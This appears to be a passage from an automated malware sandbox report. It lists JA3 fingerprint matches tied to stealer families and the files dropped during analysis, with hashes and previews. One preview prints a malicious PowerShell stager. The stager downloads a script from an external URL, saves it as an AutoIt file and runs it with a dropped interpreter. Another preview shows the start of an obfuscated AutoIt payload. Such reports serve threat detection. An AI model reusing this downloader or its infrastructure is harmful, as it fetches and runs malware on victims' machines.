                                                                                              S0O8qbVwLk.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159
                                                                                              EMasovlyrQ.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.113.159

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              3b5074b1b5d032e5620f69f9f700ff0elKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                              • 147.45.49.155
                                                                                              Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 147.45.49.155
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              setup.exeGet hashmaliciousBabadedaBrowse
                                                                                              • 147.45.49.155
                                                                                              Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 147.45.49.155
                                                                                              medicalanalysispro.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                              • 147.45.49.155
                                                                                              winwidgetshp.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                              • 147.45.49.155
                                                                                              37f463bf4616ecd445d4a1937da06e19lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              uLkHEqZ3u3.exeGet hashmaliciousLummaC, Amadey, Babadeda, LummaC Stealer, Stealc, VidarBrowse
                                                                                              • 147.45.49.155
                                                                                              gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              Rokadernes.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                              • 147.45.49.155
                                                                                              trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              9EI7wrGs4K.exeGet hashmaliciousVidarBrowse
                                                                                              • 147.45.49.155
                                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              Setup.exeGet hashmaliciousUnknownBrowse
                                                                                              • 147.45.49.155
                                                                                              AmsterdamCryptoLTD.exeGet hashmaliciousLummaC, DarkComet, LummaC Stealer, VidarBrowse
                                                                                              • 147.45.49.155

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\Public\Guard.exelKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                                                                                                R4qP4YM0QX.lnkGet hashmaliciousUnknownBrowse
                                                                                                  R8CAg00Db8.lnkGet hashmaliciousUnknownBrowse
                                                                                                    s4PymYGgSh.lnkGet hashmaliciousUnknownBrowse
                                                                                                      PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                        PkContent.exeGet hashmaliciousUnknownBrowse
                                                                                                          ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                            ldqj18tn.exeGet hashmaliciousUnknownBrowse
                                                                                                              EO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                                                                                                                RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x7ef60c72, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1310720
                                                                                                                  Entropy (8bit):0.6586378485438219
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:Jaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                  MD5:DD847F5F29AF4CBC3EA965D9FA210C67
                                                                                                                  SHA1:B566D479A9ADD8DDDCC2B3D2A2F7C8962C8F23E0
                                                                                                                  SHA-256:F5F9E884571C6858C5DAF7C0E1810B08F71CEB06ACDB6C707C27FC7F220C487C
                                                                                                                  SHA-512:9F9F33FF4568DADBCADF55B5BADF58798807B53A0FB2EC4B71A25C290D596F29CF7F5BE661D287222ADCB449EA15CDB2C325EE5E697AFADB421687C61A4D36B2
                                                                                                                  Malicious:false
                                                                                                                  Preview:~..r... ...............X\...;...{......................0.z..........{.."....|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{....................................6"....|..................\..."....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\Guard.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):893608
                                                                                                                  Entropy (8bit):6.62028134425878
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                                                                  MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                                                                  SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                                                                  SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                                                                  SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: lKin1m7Pf2.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: R4qP4YM0QX.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: R8CAg00Db8.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: s4PymYGgSh.lnk, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: PkContent.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: ldqj18tn.exe, Detection: malicious, Browse
                                                                                                                  • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                                                                                                  • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\Public\PublicProfile.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\rMpqCJnPv.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):491
                                                                                                                  Entropy (8bit):5.166492835261717
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:fZAAFEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:fKACknZ9LzjYnRSb8Cba
                                                                                                                  MD5:2ED71B6F36E471DD1716AC1B95B37818
                                                                                                                  SHA1:5F58BF987993109327440BD3ACBA1533BA79E8F8
                                                                                                                  SHA-256:371769C966E7940C3E103B9873EFA3BF5101DF2ABDAF4741929EF1634EF09913
                                                                                                                  SHA-512:7532BE0B54A6BB304E7AE511667B05DAE173F48E8E645A1FEB21CFBDBA1BAFBB6854660E3672D46CCF2B0900BBACB90CE1BA20C30D88DB9ECADDD8904D1C4967
                                                                                                                  Malicious:true
                                                                                                                  Preview:[string]$fU5L = "https://tiffany-careers.com/ygUmFny.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L

                                                                                                                  C:\Users\Public\Secure.au3

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1151623
                                                                                                                  Entropy (8bit):5.198520105522575
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:28V+jcfSygd6pMMrD3UYhU1FPCuY23OvAnzz/v3ptwcd:qcyUpMuePTX5VtwC
                                                                                                                  MD5:D4C241246F16C01DA842EDE791D91CA9
                                                                                                                  SHA1:53411935B6476CB4375D3CEA49C86615B706BDBA
                                                                                                                  SHA-256:A59A8A7120E4293622DC956255F5928FCAC30916961F97A4425D6B88D051205F
                                                                                                                  SHA-512:F70E9E5BE162EEB557A79C3EE98CC43AE96971EA501F7AD3C004D583C2F1531AC02587E3B8CC3891A5E0F34BF6A194D5D3D0F49791F04698EFF561801A30896B
                                                                                                                  Malicious:true
                                                                                                                  Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1caf42af-5059-453d-b00b-c0f333c37489.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):508
                                                                                                                  Entropy (8bit):5.060441263911329
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqjHRsBdOg2HHQOcaq3QYiubxnP7E4TfF+:Y2sRdsWCdMHa3QYhbxP7np+
                                                                                                                  MD5:A4D2A3B942F69D80CFB36FBCC2500914
                                                                                                                  SHA1:938422820071B95343A84F52D9F8E63A167C694F
                                                                                                                  SHA-256:9FF771E0839C54ED699EE1B69D30DFB5CCCCC3CCF848404607B70D50A951DE30
                                                                                                                  SHA-512:6824B0FAD32AAC16D6965B842C5A8021FFF89F53D7672F33CEEB376E4C4544EDFEA283735F692969A63ACBC0407D40CEDA14CF7A6975049A944D4F2A419A1F9D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379494319267265","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":584053},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\85444847-73b8-4ac4-9e09-5d768b831fb0.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):508
                                                                                                                  Entropy (8bit):5.047195090775108
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):508
                                                                                                                  Entropy (8bit):5.047195090775108
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF4947c4.TMP (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):508
                                                                                                                  Entropy (8bit):5.047195090775108
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223061151Z-158.bmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):65110
                                                                                                                  Entropy (8bit):4.0960479354974
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:384:u0eDil7wkRKfCqzmbeE/kh1B1Qn/0CjVQe0yZHvxUli:GA7wyCNSiE/kh1Bc/0Cj4yZJ7
                                                                                                                  MD5:AD103A90F30942B861F8499BF5C68CB9
                                                                                                                  SHA1:4C70481637E46F4E61CDBF46E8ACB05FB31AB263
                                                                                                                  SHA-256:F4DE33405E2771BA2C8FD2E0378453815CE0F3732CC624C5D163060616172389
                                                                                                                  SHA-512:0E14321DB45729D7D11D6DB505C75F50B71CE6036A91C3E18DD988CD1A43CA90DDC592F739C1170F1BA4521AE2702A1144912B77E805B9220F77EB196C05326B
                                                                                                                  Malicious:false
                                                                                                                  Preview:BMV.......6...(...k...h..... .............................................................................................................................................................................................................................................................................................................................................................qrs.ghi.................jkl.........us..LI..OM......po..LJ.._]..........*)-.0/3.}}..........98<.=<@.........................................................................................................................................................................................................................................................................................................................................dfg.`ab.`ab.~.......`ab.`ab._`a.....C@..CA..CA..pn..ca..CA..CA..MK........"..."...!.....326..."...".558...........................................................................................

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:Certificate, Version=3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1391
                                                                                                                  Entropy (8bit):7.705940075877404
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                  Malicious:false
                                                                                                                  Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......

                                                                                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):192
                                                                                                                  Entropy (8bit):2.7353301697871597
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:kkFklZeLkN/XfllXlE/HT8k7zvNNX8RolJuRdxLlGB9lQRYwpDdt:kKt9T8wpNMa8RdWBwRd
                                                                                                                  MD5:BBE1B11BD0AE1FFC24D3E6C560916513
                                                                                                                  SHA1:3A2DEF4D8571459314E2234385E7C36F32FC0BB5
                                                                                                                  SHA-256:0097AD2F06521F6F12DE61506189A4AFD1959B6FF797D8429FDD9B98B8FBED7E
                                                                                                                  SHA-512:3431B057A638E7E47834A801C7194608A469C2C9CC385BC34B928611B1A2C176A1C6190E1EA5B59152FA9E03ADAE28A2F9C211407ED221F92DD8D078106B0A90
                                                                                                                  Malicious:false
                                                                                                                  Preview:p...... .............U..(....................................................... ..........W....=...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt23.lst (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5324

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                                                                  Download File
                                                                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                  File Type:PostScript document text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1233
                                                                                                                  Entropy (8bit):5.233980037532449
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                  MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                  SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                  SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                  SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                  Malicious:false
                                                                                                                  Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

